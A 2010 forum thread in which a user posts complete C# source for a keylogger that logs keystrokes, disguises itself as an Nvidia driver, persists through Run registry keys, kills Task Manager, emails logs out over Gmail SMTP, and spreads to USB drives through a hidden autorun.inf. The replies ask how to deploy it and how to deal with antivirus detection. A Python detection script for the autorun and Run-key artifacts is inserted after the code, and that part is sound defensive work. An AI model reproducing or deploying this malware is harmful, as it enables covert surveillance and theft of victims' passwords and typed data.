Keylogger + Email + USB Spread Written in C#

Discussion in 'C#' started by Cleptography, Sep 6, 2010.

  1. Cleptography

    Cleptography New Member

    This is a keylogger + email + USB spread written in C#.
    I cannot take full credit for this program. Creds to the original author.
    I have modified it a bit, but you get the idea.

    Code:
    using System;
    using System.Diagnostics;
    using System.Timers;
    using System.Windows.Forms;
    using System.Runtime.InteropServices;
    using System.IO;
    using System.Net;
    using System.Net.Mail;
    using Microsoft.Win32;
    
    namespace Keylogger_V2
    {
        class Program
        {
            private const int WH_KEYBOARD_LL = 13;
            private const int WM_KEYDOWN = 0x0100;
            private static LowLevelKeyboardProc _proc = HookCallback;
            private static IntPtr _hookID = IntPtr.Zero;
            public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
            public static byte caps = 0, shift = 0, failed = 0;
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            private static extern bool UnhookWindowsHookEx(IntPtr hhk);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr GetModuleHandle(string lpModuleName);
    
            public static void Main()
            {
            _hookID = SetHook(_proc);
            Program.startup();
            System.Timers.Timer timer;
            timer = new System.Timers.Timer();
            timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
            timer.AutoReset = true;
            timer.Interval = 600000;
            timer.Start();
            System.Timers.Timer timer2;
            timer2 = new System.Timers.Timer();
            timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
            timer2.AutoReset = true;
            timer2.Interval = 10000;
            timer2.Start();
            Application.Run();
            GC.KeepAlive(timer);
            GC.KeepAlive(timer2);
            UnhookWindowsHookEx(_hookID);
            }
    
            public static void startup()
            {
                //Try to copy keylogger in some folders
                string source = Application.ExecutablePath.ToString();
                string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                destination=System.IO.Path.Combine(destination,"nvdisp.exe");
                try
                {
                    System.IO.File.Copy(source, destination,false);
                    source = destination;
                } catch {
                    Console.WriteLine("No authorization to copy file or other error.");
                }
                //Find if the file already exist in startup
                try
                {
                    RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", destination);
                    }
    
                    registryKey.Close();//dispose of the Key
                } catch {
                    Console.WriteLine("Error setting startup reg key.");
                }
                //Try to add to all users
                try
                {
                    RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", source);
                    }
    
                    registryKey.Close();//dispose of the key
                }
                catch
                {
                    Console.WriteLine("Error setting startup reg key for all users.");
                }
            }
    
            public static void OnTimedEvent(object source, EventArgs e)
            {
                Process[] ProcessList = Process.GetProcesses();
                foreach (Process proc in ProcessList)
                {
                    if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
                    {
                        proc.Kill();
                    }
                }
                System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
                msg.To.Add("username@gmail.com");
                msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
                msg.Subject = "i don't know";
                msg.SubjectEncoding = System.Text.Encoding.UTF8;
                msg.Body = "ciao ale";
                msg.BodyEncoding = System.Text.Encoding.UTF8;
                msg.IsBodyHtml = false;
                msg.Priority = MailPriority.High;
                SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
                client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
                client.Port = 587;
                client.Host = "smtp.gmail.com";
                client.EnableSsl = true;
                Attachment data = new Attachment(Program.path);
                msg.Attachments.Add(data);
                try
                {
                    client.Send(msg);
                    failed = 0;
                }
                catch
                {
                    data.Dispose();
                    failed = 1;
                }
                data.Dispose();
    
                if (failed == 0)
                    File.WriteAllText(Program.path, ""); //empties the file
        
                failed = 0;
        
            }
    
            private static IntPtr SetHook(LowLevelKeyboardProc proc)
            {
                using (Process curProcess = Process.GetCurrentProcess())
                using (ProcessModule curModule = curProcess.MainModule)
                {
                    return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
                }
            }
            private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
            private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
            {
                if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
                {
                    StreamWriter sw = File.AppendText(Program.path);
                    int vkCode = Marshal.ReadInt32(lParam);
                    if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
                    
                switch ((Keys)vkCode)
                    {
                        case Keys.Space:
                            sw.Write(" ");
                            break;
                        case Keys.Return:
                            sw.WriteLine("");
                            break;
                        case Keys.Back:
                            sw.Write("back");
                            break;
                        case Keys.Tab:
                            sw.Write("TAB");
                            break;
                        case Keys.D0:
                            if (Program.shift == 0) sw.Write("0");
                            else sw.Write(")");
                            break;
                        case Keys.D1:
                            if (Program.shift == 0) sw.Write("1");
                            else sw.Write("!");
                            break;
                        case Keys.D2:
                            if (Program.shift == 0) sw.Write("2");
                            else sw.Write("@");
                            break;
                        case Keys.D3:
                            if (Program.shift == 0) sw.Write("3");
                            else sw.Write("#");
                            break;
                        case Keys.D4:
                            if (Program.shift == 0) sw.Write("4");
                            else sw.Write("$");
                            break;
                        case Keys.D5:
                            if (Program.shift == 0) sw.Write("5");
                            else sw.Write("%");
                            break;
                        case Keys.D6:
                            if (Program.shift == 0) sw.Write("6");
                            else sw.Write("^");
                            break;
                        case Keys.D7:
                            if (Program.shift == 0) sw.Write("7");
                            else sw.Write("&");
                            break;
                        case Keys.D8:
                            if (Program.shift == 0) sw.Write("8");
                            else sw.Write("*");
                            break;
                        case Keys.D9:
                            if (Program.shift == 0) sw.Write("9");
                            else sw.Write("(");
                            break;
                        case Keys.LShiftKey:
                        case Keys.RShiftKey:
                        case Keys.LControlKey:
                        case Keys.RControlKey:
                        case Keys.LMenu:
                        case Keys.RMenu:
                        case Keys.LWin:
                        case Keys.RWin:
                        case Keys.Apps:
                    sw.Write("");
                            break;
                        case Keys.OemQuestion:
                            if (Program.shift == 0) sw.Write("/");
                            else sw.Write("?");
                            break;
                        case Keys.OemOpenBrackets:
                            if (Program.shift == 0) sw.Write("[");
                            else sw.Write("{");
                            break;
                        case Keys.OemCloseBrackets:
                            if (Program.shift == 0) sw.Write("]");
                            else sw.Write("}");
                            break;
                        case Keys.Oem1:
                            if (Program.shift == 0) sw.Write(";");
                            else sw.Write(":");
                            break;
                        case Keys.Oem7:
                            if (Program.shift == 0) sw.Write("'");
                            else sw.Write('"');
                            break;
                        case Keys.Oemcomma:
                            if (Program.shift == 0) sw.Write(",");
                            else sw.Write("<");
                            break;
                        case Keys.OemPeriod:
                            if (Program.shift == 0) sw.Write(".");
                            else sw.Write(">");
                            break;
                        case Keys.OemMinus:
                            if (Program.shift == 0) sw.Write("-");
                            else sw.Write("_");
                            break;
                        case Keys.Oemplus:
                            if (Program.shift == 0) sw.Write("=");
                            else sw.Write("+");
                            break;
                        case Keys.Oemtilde:
                            if (Program.shift == 0) sw.Write("`");
                            else sw.Write("~");
                        break;
                    case Keys.Oem5:
                        sw.Write("|");
                        break;
                    case Keys.Capital:
                        if (Program.caps == 0) Program.caps = 1;
                        else Program.caps = 0;
                        break;
                    default:
                        if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                        if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                        break;
                }
                Program.shift = 0;
                sw.Close();
            }    
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
            }
    
            public static void USBSpread(object source, EventArgs e)
            {
                ///////////////////////////////////////////////////////////////
                /////////////////////// USB spread class //////////////////////
                ///////////////////////////////////////////////////////////////
                //A bit modified
                string source2 = Application.ExecutablePath.ToString();
                System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
                try
                {
                    foreach (System.IO.DriveInfo drive in drives)
                    {
                        if (drive.DriveType == DriveType.Removable)
                        {
                            string driveAutorun = drive.Name + "autorun.inf";
                            StreamWriter sw = new StreamWriter(driveAutorun);
                            sw.WriteLine("[autorun]\n");
                            sw.WriteLine("open=start.exe");
                            sw.WriteLine("action=Run VMCLite");
                            sw.Close();
                            File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                            try
                            {
                                File.Copy(source2, drive.Name + "start.exe", true);
                                File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                            }
                            finally
                            {
                                Console.WriteLine("Removable device rooted");
                            }
                        }
                    }
                }
                catch (Exception e2)
                {
                    Console.WriteLine(e2.ToString());
                }
            }
        }
    }
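
For defenders triaging the artifacts the code above leaves behind (an `autorun.inf` with `open=start.exe` on removable drives, and a `Nvidia driver` Run value pointing at `nvdisp.exe` in the Application Data folder), the following is an added detection example, not part of the original post. The function names, the `alice` profile path and the two benign Run entries are constructed for illustration, and it assumes the Application Data folder resolves to `AppData\Roaming`.

```python
import ntpath
import re

# Keys in [autorun] that make Windows launch a program from the drive.
EXEC_KEYS = {"open", "shellexecute"}

def autorun_targets(inf_text):
    """Return the programs an autorun.inf would launch (case-insensitive parse)."""
    section, targets = None, []
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            key = key.lower()
            if key in EXEC_KEYS or re.fullmatch(r"shell\\[^\\]+\\command", key):
                targets.append(value)
    return targets

def suspicious_run_entries(entries):
    """Flag Run-key values whose executable sits directly in AppData\\Roaming."""
    hits = []
    for name, command in entries:
        # Take the quoted path, or the shortest prefix ending in .exe.
        m = re.match(r'\s*(?:"([^"]+)"|(.+?\.exe))', command, re.IGNORECASE)
        if not m:
            continue
        exe = m.group(1) or m.group(2)
        parent = ntpath.dirname(ntpath.normpath(exe)).lower()
        if exe.lower().endswith(".exe") and parent.endswith("\\appdata\\roaming"):
            hits.append((name, exe))
    return hits

# Constructed samples mirroring what the posted code writes (assumed paths).
SAMPLE_INF = "[autorun]\n\nopen=start.exe\naction=Run VMCLite\n"
SAMPLE_RUN = [
    ("Nvidia driver", r"C:\Users\alice\AppData\Roaming\nvdisp.exe"),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("Updater", r'"C:\Users\alice\AppData\Roaming\Vendor\updater.exe" /background'),
]

if __name__ == "__main__":
    print(autorun_targets(SAMPLE_INF))
    print(suspicious_run_entries(SAMPLE_RUN))
```

Feed it the text of any `autorun.inf` found at a removable drive root and the name/command pairs exported from the `CurrentVersion\Run` keys; an executable placed directly in the roaming profile root, rather than in a vendor subfolder, is the pattern it flags.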
     
  2. bvgmanold

    bvgmanold New Member

    What should I write in the main function of program.cs, and what about form1.cs?
     
  3. bvgmanold

    bvgmanold New Member

    Ok thanks got it :)
     
  4. bvgmanold

    bvgmanold New Member

    Hey bro, does this same code work on Windows 7, Vista, etc.?
    And I am getting an issue on some PCs where the code to write to the registry (startup) is not working; sometimes it writes, sometimes not, giving an exception about not enough privileges, sort of thing...
     
  5. justC#

    justC# New Member

    Hello C# gurus. I am a newbie to C# coding. I just wanted to know where to place this entire code. I mean, shall I first take a WinForm and use this code as a namespace? Please help me with this; I want to use this in my project. Help is highly appreciated.
     
  6. hypertuned

    hypertuned New Member

    Hi, I tested this on ESET Smart Security 8 and it caught this as a virus: "A variant of MSIL/SPY.KEYLOGGER.CAM Trojan". What should I do?
     
